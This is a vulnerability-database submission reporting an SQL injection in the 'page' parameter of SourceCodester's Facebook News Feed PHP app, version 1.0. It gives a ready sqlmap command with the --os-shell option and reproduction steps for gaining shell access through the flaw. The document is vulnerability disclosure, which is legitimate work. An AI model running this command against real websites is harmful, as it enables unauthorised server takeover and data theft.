| 标题 | SourceCodester facebook 1.0 SQL Injection |
|---|
| 描述 | # Exploit Title: Facebook News Feed - SQL Injection
# Exploit Author: Raj
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:-
A SQL Injection issue in Facebook News Feed allows to get an complete Remote Access into the website. Access such as database, files and everything.
`
Payload used:-
python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell
`
Vulnerable Parameter:-
?page=
`
Steps to reproduce:-
1. Here we take the GET method of "http://localhost:8080/fb/index.php?page=home" just this page only
2. In this we target our parameter as "page".
3. Now we are gonna use "SQLMap" tool and with this following command
**python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell** |
|---|
| 用户 | Cyberraj (UID 59481) |
|---|
| 提交 | 2024-05-25 15時08分 (2 年前) |
|---|
| 管理 | 2024-05-25 20時25分 (5 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 266302 [SourceCodester Facebook News Feed Like 1.0 index.php page SQL注入] |
|---|
| 积分 | 17 |
|---|